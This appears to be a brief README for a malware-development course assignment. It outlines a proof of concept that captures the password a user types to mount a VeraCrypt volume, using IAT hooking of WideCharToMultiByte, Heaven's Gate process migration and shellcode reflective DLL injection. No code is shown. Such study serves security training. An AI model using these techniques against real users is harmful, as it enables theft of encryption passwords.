This is the assignment part of the course: Malware Development Intermediate, by sektor7. The course can be found here: MalDev Intermediate. The purpose of this assignment is to steal the password (without using a keylogger), which a user types to mount an encrypted disk (volume), created with VeraCrypt software. To achieve it, the assignment consists of 3 parts:
- VCsniff: Use IAT Hooking to capture the password from the API
WideCharToMultiByte - VCmigrate: Migrate from 32-bit process to 64-bit process using Heaven's Gate
- VCload: Inject into the 32-bit process and perform Shellcode Reflective DLL Injection (sRDI) to do the migration and the password stealing
A detailed blog post can be found here: geobour98 Blog
This PoC was developed for Educational purposes only!